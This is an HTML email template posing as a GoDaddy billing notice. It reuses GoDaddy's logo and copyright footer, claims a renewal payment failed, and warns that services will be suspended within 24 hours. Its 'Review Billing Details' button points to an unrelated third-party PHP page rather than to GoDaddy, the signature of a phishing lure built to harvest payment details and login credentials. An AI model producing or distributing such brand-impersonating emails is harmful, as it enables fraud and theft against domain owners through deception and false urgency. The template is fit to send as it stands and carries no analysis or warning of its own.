<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Billing Information Notice</title>
<style>
body{
margin:0;
padding:0;
background:#f4f5f7;
font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif;
color:#111;
}
.wrapper{
width:100%;
background:#f4f5f7;
padding:30px 10px;
}
.container{
max-width:640px;
margin:auto;
background:#fff;
border-radius:14px;
overflow:hidden;
box-shadow:0 15px 40px rgba(0,0,0,.08);
}
/* hidden preheader */
.preheader{
display:none;
max-height:0;
max-width:0;
opacity:0;
overflow:hidden;
mso-hide:all;
font-size:1px;
line-height:1px;
}
/* header */
.header{
background:#000;
text-align:center;
padding:26px 20px;
}
.header img{
max-width:165px;
height:auto;
}
/* content */
.content{
padding:42px 46px;
}
h1{
margin:0 0 20px;
font-size:28px;
line-height:1.3;
letter-spacing:-0.4px;
color:#000;
}
p{
margin:0 0 18px;
font-size:16px;
line-height:1.75;
color:#444;
}
/* billing card */
.notice{
background:#f8f9fb;
border:1px solid #eceef2;
border-radius:12px;
padding:18px;
margin:26px 0;
font-size:14px;
color:#555;
line-height:1.7;
}
/* button */
.btn-wrap{
text-align:center;
margin:34px 0 28px;
}
.btn{
background:#000;
color:#fff !important;
text-decoration:none;
font-weight:700;
font-size:14px;
letter-spacing:.3px;
padding:14px 36px;
border-radius:40px;
display:inline-block;
}
/* footer */
.footer{
border-top:1px solid #eee;
padding:22px 25px;
font-size:12px;
color:#888;
text-align:center;
line-height:1.6;
}
/* mobile */
@media only screen and (max-width:600px){
.content{
padding:28px 22px !important;
}
h1{
font-size:23px !important;
}
p{
font-size:15px !important;
}
.btn{
display:block !important;
width:100% !important;
box-sizing:border-box;
text-align:center;
}
}
</style>
</head>
<body>
<div class="preheader">
Review your billing information to keep your services running smoothly.
</div>
<div class="wrapper">
<div class="container">
<div class="header">
<img src="https://img1.wsimg.com/cdnassets/m/4872e431456b8f69/original/GoDaddy-Airo-Logo-m.svg" alt="Company Logo">
</div>
<div class="content">
<h1>Billing Information Notice</h1>
<p>Hello,</p>
<p>
We were unable to complete a recent renewal using the payment method currently saved in your account.
</p>
<p>
To help keep your domain and related services active, we recommend reviewing your billing details from your account dashboard.
To prevent your services from being suspended within 24 hours, please update your billing details immediately.
</p>
<div class="notice">
✔ Review payment method<br>
✔ Confirm billing details<br>
✔ Ensure account information is current
</div>
<p>
Once your payment details are updated, renewals will continue according to your account settings.
</p>
<div class="btn-wrap">
<a href="https://tomimarkets.net/hujo.php" class="btn">
REVIEW BILLING DETAILS
</a>
</div>
<p>
If your payment information has already been updated, no further action is required.
</p>
</div>
<div class="footer">
© 1999–2026 GoDaddy Operating Company, LLC. All Rights Reserved.<br>
Privacy Policy • Account Preferences • Support
</div>
</div>
</div>
</body>
</html>